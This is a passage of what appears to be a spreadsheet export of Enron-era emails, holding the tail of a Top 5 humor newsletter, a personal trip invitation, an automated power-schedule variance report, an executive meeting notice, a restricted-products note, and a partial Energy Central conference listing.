     All work 'n' no play makez Ice Tray a dull bo-weee..."_x000D_
_x000D_
 8&gt; His new video features him prancing around in a Dorothy_x000D_
    outfit singing, "Ding, dong, the wi-otch is dead."_x000D_
_x000D_
 7&gt; Now wants to be known as "The Rapper Formerly Known As_x000D_
    Simpering Girly Pee-Boy."_x000D_
_x000D_
 6&gt; Overheard telling Jennifer Lopez, "Quit shaking that thing_x000D_
    in my face, and go put some clothes on already!"_x000D_
_x000D_
 5&gt; Wears his white do-rag after Labor Day._x000D_
_x000D_
 4&gt; Produces double album of nothin' but songs about Madeleine_x000D_
    Albright's ass._x000D_
_x000D_
 3&gt; On election day, announced he's switching party affiliation_x000D_
    to West Coast._x000D_
_x000D_
 2&gt; "Help the po-lice, 'cuz it's nice when they're around._x000D_
    We need 'em cuz they protect our town."_x000D_
_x000D_
_x000D_
    and Topfive.com's Number 1 Sign a Rapper Has Gone Nuts..._x000D_
_x000D_
_x000D_
 1&gt; "The wheels on the bus go 'round and 'round!  Woah!  Yeah!"_x000D_
_x000D_
_x000D_
_x000D_
              [  The Top 5 List   www.topfive.com  ]_x000D_
              [   Copyright 2001 by Chris White    ]_x000D_
_x000D_
_x000D_
_x000D_
==================================================================_x000D_
_x000D_
             NEED SOME POST-TAXDAY PURCHASING POWER?_x000D_
_x000D_
                      NextCard Internet Visa_x000D_
           *  Instant Approvals -- GET APPROVED TODAY!_x000D_
                  *  As low as 2.9% Intro APR!!_x000D_
_x000D_
        http://www.nextcard.com/index6.html?ref=aff0034962_x000D_
_x000D_
==================================================================_x000D_
_x000D_
                      Rumination of the Day_x000D_
_x000D_
            As far as ineffectual suicide methods go,_x000D_
                    I'm sticking with Visine._x000D_
_x000D_
                       (Christy Simuangco)_x000D_
_x000D_
_x000D_
  To subscribe to Ruminations:  Ruminations-subscribe@topica.com_x000D_
_x000D_
==================================================================_x000D_
Selected from 150 submissions from 57 contributors._x000D_
Today's Top 5 List authors are:_x000D_
------------------------------------------------------------------_x000D_
Doug Finney, Houston, TX          --  1  (5th #1 / 3rd in a row!)_x000D_
Dan Johnson, Champlin, MN         --  2_x000D_
Wade Kwon, Birmingham, AL         --  3_x000D_
Rob Knapp, Charlotte, NC          --  4_x000D_
David Hyatt, New York, NY         --  5_x000D_
Martin Bredeck, Hybla Valley, VA  --  6_x000D_
Mark Niebuhr, Minneapolis, MN     --  7, Banner Tag_x000D_
Steven Wilber, Pomeroy, WA        --  8_x000D_
Curtis Matthews, Kennesaw, GA     --  9_x000D_
Beth Gaynor, Columbus, OH         -- 10_x000D_
Dave Wesley, Pleasant Hill, CA    -- 11  (Hall of Famer)_x000D_
Jason Anderson, Birmingham, AL    -- 12_x000D_
Jody LaFerriere, Leominster, MA   -- Topic_x000D_
Doug Finney, Houston, TX          -- Runner Up list name_x000D_
Larry Hollister, Concord, CA      -- HM list name  (Hall of Famer)_x000D_
Slick Sharkey, Miami, FL          -- List moderator_x000D_
Chris White, Los Angeles, CA      -- List owner/editor_x000D_
Russell "O.D.B." Jones, Brooklyn, NY  -- Ambience_x000D_
 -&gt; Ambience explanation: http://www.topfive.com/arcs/am041701.htm_x000D_
------------------------------------------------------------------_x000D_
               "M.C. Lamer"    and    "Hip Hopeless"_x000D_
         The Runners Up and Honorable Mention submissions_x000D_
   The Runners Up and Honorable Mention submissions for today's_x000D_
    list can be found on our website:  http://www.topfive.com_x000D_
==================================================================_x000D_
[       T  H  E     T  O  P     F  I  V  E     L  I  S  T        ]_x000D_
[  TOP5 -- The Home of Original Humor    http://www.topfive.com  ]_x000D_
[----------------------------------------------------------------]_x000D_
The Top 5 List   (original lists)        top5-subscribe@topica.com_x000D_
Top5 Classic     (greatest hits)  top5classic-subscribe@topica.com_x000D_
Ruminations      (odd thoughts)   ruminations-subscribe@topica.com_x000D_
The Daily Probe  (news satire)          probe-subscribe@topica.com_x000D_
The Whack Report (real stories)         whack-subscribe@topica.com_x000D_
The Kid Report   (kid stories)      kidreport-subscribe@topica.com_x000D_
Gadget Geek      (cool stuff)      gadgetgeek-subscribe@topica.com_x000D_
==================================================================_x000D_
[      Copyright 2001 by Chris White   All rights reserved.      ]_x000D_
[    Do not forward, publish, broadcast, or use in any manner    ]_x000D_
[     without crediting "The Top 5 List at www.topfive.com"      ]_x000D_
==================================================================_x000D_
[    To unsubscribe: Send mail to Top5-unsubscribe@topica.com    ]_x000D_
[            To bitch at the owner: chris@topfive.com            ]_x000D_
[                     http://www.topfive.com                     ]_x000D_
==================================================================_x000D_
_x000D_
============================================================_x000D_
Save on all your monthly bills!_x000D_
LowerMyBills.com has compared 100's of providers so you_x000D_
don't have to. Our free service guarantees you savings on_x000D_
everything from Insurance to Long distance._x000D_
http://click.topica.com/caaabPfclvXASclwLh7f/LowerMyBills_x000D_
============================================================_x000D_
_x000D_
==================================================================?EASY UNSUBSCRIBE click here: http://topica.com/u/?clvXAS.clwLh7?Or send an email To: Top5-unsubscribe@topica.com?This email was sent to: dquillen@aracnet.com??T O P I C A  -- Learn More. Surf Less.?Newsletters, Tips and Discussions on Topics You Choose.?http://www.topica.com/partner/tag01?==================================================================_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 06:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rachel.bonilla-kragel@accenture.com'})</t>
  </si>
  <si>
    <t>I have also been meaning to email you.  Unfortunately, I do not have much _x000D_
time to talk with you, I have to head out to alabama unexpectedly, my _x000D_
gradfather is pretty ill.  We were wondering if you guys might want to go to _x000D_
Jazz fest.  THe dates are 4/226-4/30(thurs. arrival, monday departure).  We _x000D_
have about 5 couples going right now and the room rate is $440 per couple for _x000D_
all four nights total.  Let me know if you are interested, we have to have _x000D_
the rooms paid for by 2/15/01.  Talk to you soon.  Thanks._x000D_
PL</t>
  </si>
  <si>
    <t>Sat, 14 Apr 2001 01:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/14/01; HourAhead hour: 9;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/14/01; HourAhead hour: 9;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1409.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  TIE_POINT: SLVRPK_7_SPP_x000D_
  INTERCHG_ID: EPMI_CISO_SPP_x000D_
  ENGY_TYPE: WHEEL_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 9 / Preferred:  50.00 / Final:  38.21)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_EPE_x000D_
  ENGY_TYPE: FIRM_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 9 / Preferred:  20.00 / Final:  15.40)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  TIE_POINT: FCORNR_5_PSUEDO_x000D_
  INTERCHG_ID: EPMI_CISO_TOBY_x000D_
  ENGY_TYPE: FIRM_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 9 / Preferred:  12.00 / Final:   9.20)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_SPP_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 9 / Preferred: 270.00 / Final: 265.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  TRADING_SC: PWRX_x000D_
  PNT_OF_INTRC: NP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 2_x000D_
  DEAL_NO: 1_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 9 / Preferred:  75.00 / Final:  62.63)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  TRADING_SC: PWRX_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 2_x000D_
  DEAL_NO: 1_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 9 / Preferred:   5.13 / Final:   4.93)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE2_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 9 / Preferred:  46.89 / Final:  45.29)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/14/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Dec 2001 14:31:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.mcmahon@enron.com', 'a..hughes@enron.com', 'rick.buy@enron.com', 'joannie.williamson@enron.com', 'stanley.horton@enron.com', 'w..delainey@enron.com', 'janet.dietrich@enron.com', 'james.derrick@enron.com', 'jim.fallon@enron.com', "john'.'sherriff@enron.com", 'mark.frevert@enron.com', 'mark.koenig@enron.com', 'richard.causey@enron.com', 'j..kean@enron.com', 'kenneth.lay@enron.com', 'e..haedicke@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>RE: Management Committee Meeting - Monday, December 17</t>
  </si>
  <si>
    <t>The meeting will take place at 11:00a._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Williamson, Joannie  _x000D_
Sent:	Friday, December 14, 2001 4:24 PM_x000D_
To:	'john_1_sherriff@hotmail.com'; Bowen Jr., Raymond; Buy, Rick; Causey, Richard; Delainey, David W.; Derrick Jr., James; Dietrich, Janet; Fallon, Jim; Frevert, Mark; Haedicke, Mark E.; Horton, Stanley; James Hughes; Kean, Steven J.; Koenig, Mark; Lay, Kenneth; McMahon, Jeffrey; Sherriff, John; Whalley, Greg_x000D_
Cc:	Hickerson, Gary; Rieker, Paula; Valencia, Laura; Zoch, Judy; Blackwood, Connie; Chapman, Kay; Daw, Nicki; Elbertson, Janette; Ferrari, Kerry; Fleming, Rosalee; Ford, Sue; Harris, Stephanie J ; Heathman, Karen K.; Marshall, Lucy; McVicker, Maureen; Mendez, Yorleni; Schiller, Marsha; Stark, Cindy; Taylor, Liz; Tori Wells; Westbrook, Sharron; Williamson, Joannie_x000D_
Subject:	Management Committee Meeting - Monday, December 17_x000D_
_x000D_
Please reply and let me know if you will participate in person or via conference call.  The dial-in number is 801-983-4013, please reference Ken Lay._x000D_
_x000D_
Thanks,_x000D_
Joannie_x000D_
3-1769</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 06:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: restricted products</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Tori Kuykendall/HOU/ECT on 02/21/2001 _x000D_
02:15 PM ---------------------------_x000D_
_x000D_
_x000D_
Tori Kuykendall_x000D_
02/21/2001 01:44 PM_x000D_
To: Stephanie Sever/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: restricted products  _x000D_
_x000D_
Here is the way we would like to see the restricted list for the EP Blanco _x000D_
Avg products -- I have omitted and added counterparties.  Can we make these _x000D_
changes as soon as possible?  I would like to be able to tell the new _x000D_
counterparties as soon as possible so they can start clicking!  Thanks!_x000D_
 _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 15:30:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'conferences@mail.energycentral.com'})</t>
  </si>
  <si>
    <t>frozenset({'khyatt@enron.com'})</t>
  </si>
  <si>
    <t>Energy Central Conference Watch - 1/11/02</t>
  </si>
  <si>
    <t xml:space="preserve">____________________________________________________________________________x000D_
_x000D_
ENERGY CENTRAL CONFERENCE WATCH_x000D_
  Covering Trade Shows, Conferences and Seminars for the Power Industry_x000D_
WEEK ENDING January 11, 2002_x000D_
____________________________________________________________________________x000D_
  _x000D_
  ----------------------------------------------------------_x000D_
  Online Registration Available! _x000D_
  Look for the events labeled "Online Registration Available!". _x000D_
  TO REGISTER INSTANTLY. "Special Offer!" means a special_x000D_
  discounted price for Energy Central Members!_x000D_
_x000D_
  Links are provided under selected events._x000D_
  ---------------------------------------------------------- _x000D_
_x000D_
  This update is a FREE supplement to the Energy Central_x000D_
  Daily Electric Power News Service. It is delivered each_x000D_
  Friday and includes New Listings, Upcoming Events, and_x000D_
  Featured Listings._x000D_
  ----------------------------------------------------------_x000D_
  To receive this service in HTML format, go to _x000D_
  http://www.energycentral.com/sections/services/_x000D_
  ----------------------------------------------------------_x000D_
  You MAY redistribute this message to others (via e-mail, print, _x000D_
  Intranet or other methods), as long as the entire message is kept _x000D_
  intact._x000D_
_x000D_
  For more information on the Daily Energy Central Electric Power _x000D_
  News Service, send a message to newstrial@energycentral.com or type _x000D_
  an 'x' in the brackets below and send this message back to_x000D_
  conferences@mail.energycentral.com._x000D_
_x000D_
  Energy Central maintains a comprehensive database of upcoming _x000D_
  conferences, seminars and trade shows related to the electric power_x000D_
  industry. You can access this database at _x000D_
  http://www.energycentral.com/sections/events_x000D_
_x000D_
  You may request more information on any listing in this message _x000D_
  simply by typing an 'x' between the brackets next to the listing and_x000D_
  sending the message back to conferences@mail.energycentral.com. _x000D_
  For more information on requesting information, or un-subscribing_x000D_
  to the Energy Central News Service, see the end of this message._x000D_
_x000D_
  [ ] 17-105: Request information on Energy Central Daily News Service_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  CONFERENCE ANNOUCEMENTS_x000D_
____________________________________________________________________________x000D_
_x000D_
  Contact sales@energycentral.com or (303) 782-5510 for information_x000D_
  on FEATURING your event in this space.  Your conference, seminar_x000D_
  or trade show listing can reach over 20,000 electric power_x000D_
  professionals next week!_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  FEATURED LISTINGS_x000D_
____________________________________________________________________________x000D_
_x000D_
ENERGY VENTURE FAIR II_x000D_
  1/29/02 to 1/30/02 - Houston, TX USA_x000D_
  [ ] 27-7401: Request more information on this listing_x000D_
  http://www.energyventurefair.com_x000D_
_x000D_
BUILDING AND MAINTAINING CUSTOMER RELATIONS &amp; BRANDING STRATEGIES_x000D_
  1/29/02 to 1/30/02 - San Diego, CA USA_x000D_
  [ ] 27-7191: Request more information on this listing_x000D_
  http://www.acius.net/?cID=79 _x000D_
_x000D_
FACILITY ENERGY COST MANAGEMENT_x000D_
  1/31/02 to 2/1/02 - New Orleans, LA USA_x000D_
  [ ] 27-7255: Request more information on this listing_x000D_
  http://www.cbinet.com/_x000D_
_x000D_
2ND ANNUAL CARIBBEAN ENERGY_x000D_
  1/31/02 to 2/1/02 - Miami, FL USA_x000D_
  [ ] 27-7256: Request more information on this listing_x000D_
  http://www.cbinet.com/_x000D_
_x000D_
FUEL CELL DYNAMICS 2002: REALITY, NOT HYPE_x000D_
  2/6/02 to 2/7/02 - New York, NY USA_x000D_
  [ ] 27-6930: Request more information on this listing_x000D_
  http://www.alliedworld.com_x000D_
  ONLINE REGISTRATION AVAILABLE!_x000D_
  http://www.energycentral.com/go_event.cfm?id=6930 TO REGISTER ONLINE!_x000D_
_x000D_
CERAWEEK 2002 - THE NEW FACE OF RISK: ENERGY STRATEGIES FOR A CHANGED WORLD_x000D_
  2/11/02 to 2/15/02 - Houston, TX USA_x000D_
  [ ] 27-7462: Request more information on this listing_x000D_
  http://www.cera.com/ceraweek_x000D_
_x000D_
4TH ANNUAL ELECTRIC ASSET VALUATION_x000D_
  2/25/02 to 2/26/02 - Houston, TX USA_x000D_
  [ ] 27-7257: Request more information on this listing_x000D_
  http://www.cbinet.com/_x000D_
_x000D_
GLOBE 2002 INTERNATIONAL CONFERENCE &amp; TRADE FAIR ON BUSINESS AND THE ENVIRONMENT_x000D_
  3/13/02 to 3/15/02 - Vancouver, BC Canada_x000D_
  [ ] 27-5833: Request more information on this listing_x000D_
  http://www.globe.ca_x000D_
  ONLINE REGISTRATION AVAILABLE!_x000D_
  http://www.energycentral.com/go_event.cfm?id=5833 TO REGISTER ONLINE!_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  NEW LISTINGS_x000D_
____________________________________________________________________________x000D_
_x000D_
CRYSTALLIZATION OPERATIONS_x000D_
  2/7/02 to 2/8/02 - New Port Beach, CA USA_x000D_
  [ ] 27-7524: Request more information on this listing_x000D_
_x000D_
PLANNING AND IMPLEMENTING POINT-TO-POINT MICROWAVE RADIO SYSTEMS_x000D_
  2/27/02 to 3/1/02 - Orlando, FL USA_x000D_
  [ ] 27-7517: Request more information on this listing_x000D_
_x000D_
PRINCIPLES OF SUBSTATION DESIGN AND CONSTRUCTION_x000D_
  3/11/02 to 3/13/02 - Madison, WI USA_x000D_
  [ ] 27-7516: Request more information on this listing_x000D_
_x000D_
PRACTICAL PROJECT EVALUATION: CAPITAL AND OPERATING COST ESTIMATION_x000D_
  3/11/02 to 3/13/02 - New Orleans, LA USA_x000D_
  [ ] 27-7522: Request more information on this listing_x000D_
_x000D_
HIGH VOLTAGE ELECTRICAL SAFETY OSHA REQ 29 CFR 1910.269_x000D_
  3/13/02 to 3/14/02 - Albuquerque, NM USA_x000D_
  [ ] 27-7515: Request more information on this listing_x000D_
_x000D_
EXECUNET FOR CXO_x000D_
  3/17/02 to 3/18/02 - Tampa, FL USA_x000D_
  [ ] 27-7519: Request more information on this listing_x000D_
_x000D_
INVESTORS' CIRCLE WEST COAST VENTURE FAIR_x000D_
  3/18/02 to 3/18/02 - Berkeley, CA USA_x000D_
  [ ] 27-7508: Request more information on this listing_x000D_
_x000D_
ELECTRIC POWER 2002_x000D_
  3/19/02 to 3/21/02 - St Louis, MO USA_x000D_
  [ ] 27-7507: Request more information on this listing_x000D_
_x000D_
17TH ANNUAL GLOBAL POWER MARKETS CONFERENCE_x000D_
  3/24/02 to 3/26/02 - New Orleans, LA USA_x000D_
  [ ] 27-7509: Request more information on this listing_x000D_
_x000D_
HIGH VOLTAGE ELECTRICAL SAFETY OSHA REQ. 29 CFR 1910.269_x000D_
  3/27/02 to 3/28/02 - San Diego, CA USA_x000D_
  [ ] 27-7514: Request more information on this listing_x000D_
_x000D_
FACILITY FORUM 2002_x000D_
  4/21/02 to 4/24/02 - San Diego, CA USA_x000D_
  [ ] 27-7513: Request more information on this listing_x000D_
_x000D_
PROJECT MANAGEMENT_x000D_
  4/22/02 to 4/24/02 - Baltimore, MD USA_x000D_
  [ ] 27-7523: Request more information on this listing_x000D_
_x000D_
CRYSTALLIZATION OPERATIONS_x000D_
  4/25/02 to 4/26/02 - Baltimore, MD USA_x000D_
  [ ] 27-7525: Request more information on this listing_x000D_
_x000D_
LIVE 2002_x000D_
  4/28/02 to 4/30/02 - Anaheim, CA USA_x000D_
  [ ] 27-7518: Request more information on this listing_x000D_
_x000D_
METERING AMERICAS_x000D_
  4/29/02 to 5/1/02 - New Orleans, LA USA_x000D_
  [ ] 27-7520: Request more information on this listing_x000D_
_x000D_
ENERGY 2002 -- HOT CHALLENGES, COOL SOLUTIONS WORKSHOP &amp; EXPOSITION_x000D_
  6/2/02 to 6/5/02 - Palm Springs, CA USA_x000D_
  [ ] 27-7512: Request more information on this listing_x000D_
_x000D_
CIS CONFERENCE_x000D_
  6/9/02 to 6/12/02 - Baltimore, MD US_x000D_
  [ ] 27-7511: Request more information on this listing_x000D_
_x000D_
3RD ANNUAL PETRO BUSINESS IT 2002_x000D_
  6/10/02 to 6/11/02 - Houston, TX USA_x000D_
  [ ] 27-7521: Request more information on this listing_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  UPCOMING EVENTS - NEXT TWO WEEKS_x000D_
____________________________________________________________________________x000D_
_x000D_
ENERGY IT CONFERENCE &amp; EXPO_x000D_
  1/13/02 to 1/15/02 - New Orleans, LA USA_x000D_
  [ ] 27-7354: Request more information on this listing_x000D_
_x000D_
7TH ANNUAL US WATER &amp; WASTEWATER_x000D_
  1/14/02 to 1/15/02 - Washington, DC USA_x000D_
  [ ] 27-7252: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF ENERGY &amp; ELECTRICITY FUTURES, OPTIONS &amp; DERIVATIVES_x000D_
  1/15/02 to 1/16/02 - Phoenix, AZ USA_x000D_
  [ ] 27-7154: Request more information on this listing_x000D_
_x000D_
BASICS OF INDUSTRIAL ELECTRICITY_x000D_
  1/15/02 to 1/17/02 - Williamsburg, VA USA_x000D_
  [ ] 27-7360: Request more information on this listing_x000D_
_x000D_
UK EMISSIONS TRADING SCHEME SIMULATION GAME AND SEMINAR_x000D_
  1/16/02 to 1/17/02 - London,  UK_x000D_
  [ ] 27-7381: Request more information on this listing_x000D_
_x000D_
ENERGY SOLUTIONS FOR CALIFORNIA INDUSTRY: WAYS TO IMPROVE OPERATIONS AND PROFITABILITY_x000D_
  1/16/02 to 1/16/02 - San Jose, CA USA_x000D_
  [ ] 27-7081: Request more information on this listing_x000D_
_x000D_
MANAGING THE RISKS OF RETAIL OPERATIONS_x000D_
  1/16/02 to 1/18/02 - Orlando, FL USA_x000D_
  [ ] 27-7269: Request more information on this listing_x000D_
_x000D_
MANAGING THE RISKS OF RETAIL OPERATIONS_x000D_
  1/16/02 to 1/18/02 - Orlando, FL USA_x000D_
  [ ] 27-7207: Request more information on this listing_x000D_
_x000D_
ADVANCED CLEAN COAL GENERATION TECHNOLOGIES_x000D_
  1/16/02 to 1/18/02 - Atlanta, GA USA_x000D_
  [ ] 27-7340: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF ELECTRIC POWER TRADING_x000D_
  1/17/02 to 1/17/02 - Phoenix, AZ USA_x000D_
  [ ] 27-7157: Request more information on this listing_x000D_
_x000D_
MANAGING ENERGY RISK_x000D_
  1/17/02 to 1/17/02 - Phoenix, AZ USA_x000D_
  [ ] 27-7162: Request more information on this listing_x000D_
_x000D_
THE COMMERCIALIZATION OF ENERGY TECHNOLOGIES_x000D_
  1/17/02 to 1/18/02 - New York, NY USA_x000D_
  [ ] 27-7253: Request more information on this listing_x000D_
_x000D_
NATURAL GAS - 101 SEMINAR_x000D_
  1/17/02 to 1/18/02 - Jupiter Beach, FL USA_x000D_
  [ ] 27-7469: Request more information on this listing_x000D_
_x000D_
GAS-TO-ELECTRICITY ARBITRAGE &amp; MAXIMIZING THE PROFITABILITY OF ELECTRIC GENERATION_x000D_
  1/18/02 to 1/18/02 - Carnegie, PA USA_x000D_
  [ ] 27-7160: Request more information on this listing_x000D_
_x000D_
RENEWABLE ENERGY FOR RURAL DEVELOPMENT_x000D_
  1/19/02 to 1/21/02 - Dhaka,  Bangladesh_x000D_
  [ ] 27-6347: Request more information on this listing_x000D_
_x000D_
FERC 101 &amp; 102 SAN FRANCISCO_x000D_
  1/21/02 to 1/22/02 - San Francisco, CA USA_x000D_
  [ ] 27-7244: Request more information on this listing_x000D_
_x000D_
DISTRIBUTED GENERATION TECHNOLOGY SEMINAR_x000D_
  1/22/02 to 1/23/02 - Miami, FL USA_x000D_
  [ ] 27-7434: Request more information on this listing_x000D_
_x000D_
ELECTRICITY RISK MANAGEMENT 101_x000D_
  1/22/02 to 1/23/02 - New York City, NY USA_x000D_
  [ ] 27-7320: Request more information on this listing_x000D_
_x000D_
5TH ELECTRIC UTILITIES ENVIRONMENTAL CONFERENCE_x000D_
  1/22/02 to 1/25/02 - Tucson, AZ USA_x000D_
  [ ] 27-7460: Request more information on this listing_x000D_
_x000D_
BASIS TRADING WITH NATURAL GAS FUTURES &amp; OPTIONS_x000D_
  1/22/02 to 1/23/02 - Calgary, AL Canada_x000D_
  [ ] 27-7492: Request more information on this listing_x000D_
_x000D_
ENERGY INFRASTRUCTURE IN THE NORTHEAST_x000D_
  1/23/02 to 1/25/02 - Boston, MA USA_x000D_
  [ ] 27-7303: Request more information on this listing_x000D_
_x000D_
EUROPEAN ONLINE TRADING_x000D_
  1/23/02 to 1/24/02 - Maida Vale, London,  United Kingdom_x000D_
  [ ] 27-7308: Request more information on this listing_x000D_
_x000D_
BUILDING NEW COAL-FIRED GENERATION_x000D_
  1/23/02 to 1/25/02 - Phoenix, AZ USA_x000D_
  [ ] 27-7208: Request more information on this listing_x000D_
_x000D_
HIGH-TEMPERATURE FUEL CELL POWER PLANT SYSTEMS_x000D_
  1/23/02 to 1/25/02 - Clemson, SC USA_x000D_
  [ ] 27-7395: Request more information on this listing_x000D_
_x000D_
THE 15TH ANNUAL UTILITY M&amp;A SYMPOSIUM_x000D_
  1/23/02 to 1/24/02 - New York, NY USA_x000D_
  [ ] 27-7451: Request more information on this listing_x000D_
_x000D_
3RD ANNUAL STABILITY DATA MANAGEMENT_x000D_
  1/24/02 to 1/25/02 - Philadelphia, PA USA_x000D_
  [ ] 27-7479: Request more information on this listing_x000D_
_x000D_
PORTFOLIO OPTIMIZATION FOR ELECTRIC UTILITIES CONFERENCE_x000D_
  1/24/02 to 1/25/02 - New York City, NY USA_x000D_
  [ ] 27-7321: Request more information on this listing_x000D_
_x000D_
WORLD ENERGY SECURITY AND COMMERCE FORUM_x000D_
  1/24/02 to 1/24/02 - 999 Ninth Street NW, Washington, DC USA_x000D_
  [ ] 27-7333: Request more information on this listing_x000D_
_x000D_
UTILITY BILLING_x000D_
  1/24/02 to 1/25/02 - Las Vegas, NV USA_x000D_
  [ ] 27-7344: Request more information on this listing_x000D_
_x000D_
TAILINGS AND MINE WASTE '02_x000D_
  1/27/02 to 1/30/02 - Fort Collins, CO USA_x000D_
  [ ] 27-7316: Request more information on this listing_x000D_
_x000D_
6TH ANNUAL PROFIT FROM MERCHANT PLANTS_x000D_
  1/28/02 to 1/29/02 - Houston, TX USA_x000D_
  [ ] 27-7254: Request more information on this listing_x000D_
_x000D_
INVESTMENT OPPORTUNITIES IN SPAIN'S ENERGY INDUSTRY_x000D_
  1/28/02 to 1/29/02 - Madrid,  Spain_x000D_
  [ ] 27-7339: Request more information on this listing_x000D_
_x000D_
VALIDATING UTILITIES_x000D_
  1/28/02 to 1/30/02 - New York, NY USA_x000D_
  [ ] 27-7347: Request more information on this listing_x000D_
_x000D_
TRANSMISSION EXECUTIVE FORUM_x000D_
  1/29/02 to 1/29/02 - Washington, DC USA_x000D_
  [ ] 27-7384: Request more information on this listing_x000D_
_x000D_
NATURAL GAS BASIC TRAINING_x000D_
  1/29/02 to 1/29/02 - Houston, TX USA_x000D_
  [ ] 27-7386: Request more information on this listing_x000D_
_x000D_
ENERGY VENTURE FAIR II_x000D_
  1/29/02 to 1/30/02 - Houston, TX USA_x000D_
  [ ] 27-7401: Request more information on this listing_x000D_
  http://www.energyventurefair.com_x000D_
_x000D_
IT'S ONLY TIME AND MONEY_x000D_
  1/29/02 to 1/29/02 - Denver, CO USA_x000D_
  [ ] 27-7417: Request more information on this listing_x000D_
_x000D_
BASICS OF INDUSTRIAL ELECTRICITY_x000D_
  1/29/02 to 1/31/02 - Raleigh, NC USA_x000D_
  [ ] 27-7441: Request more information on this listing_x000D_
_x000D_
BUILDING AND MAINTAINING CUSTOMER RELATIONS &amp; BRANDING STRATEGIES_x000D_
  1/29/02 to 1/30/02 - San Diego, CA USA_x000D_
  [ ] 27-7191: Request more information on this listing_x000D_
  http://www.acius.net/?cID=79 _x000D_
_x000D_
SUCCESSFUL BUSINESS STRATEGIES FOR STADTWERKE_x000D_
  1/29/02 to 1/30/02 - Berlin,  Germany_x000D_
  [ ] 27-7332: Request more information on this listing_x000D_
_x000D_
BASIC TELEPHONY AND DIGITAL SWITCHING_x000D_
  1/29/02 to 2/1/02 - Madison, WI USA_x000D_
  [ ] 27-7353: Request more information on this listing_x000D_
_x000D_
TRANSMISSION SUMMIT 2002: THE IMPACT OF NEW FERC POLICIES ON THE FUTURE OF THE GRID_x000D_
  1/30/02 to 1/31/02 - Washington, DC USA_x000D_
  [ ] 27-7385: Request more information on this listing_x000D_
_x000D_
ELECTRICITY BASIC TRAINING_x000D_
  1/30/02 to 1/30/02 - Houston, TX USA_x000D_
  [ ] 27-7387: Request more information on this listing_x000D_
_x000D_
THE 2002 NATIONAL ELECTRICAL CODE_x000D_
  1/30/02 to 2/1/02 - Orlando, FL USA_x000D_
  [ ] 27-7181: Request more information on this listing_x000D_
_x000D_
ELECTRICITY - 101 SEMINAR_x000D_
  1/30/02 to 1/31/02 - W Palm Beach, FL USA_x000D_
  [ ] 27-7463: Request more information on this listing_x000D_
_x000D_
ENERGY RISK MANAGEMENT BASIC TRAINING_x000D_
  1/31/02 to 1/31/02 - Houston, TX USA_x000D_
  [ ] 27-7388: Request more information on this listing_x000D_
_x000D_
FACILITY ENERGY COST MANAGEMENT_x000D_
  1/31/02 to 2/1/02 - New Orleans, LA USA_x000D_
  [ ] 27-7255: Request more information on this listing_x000D_
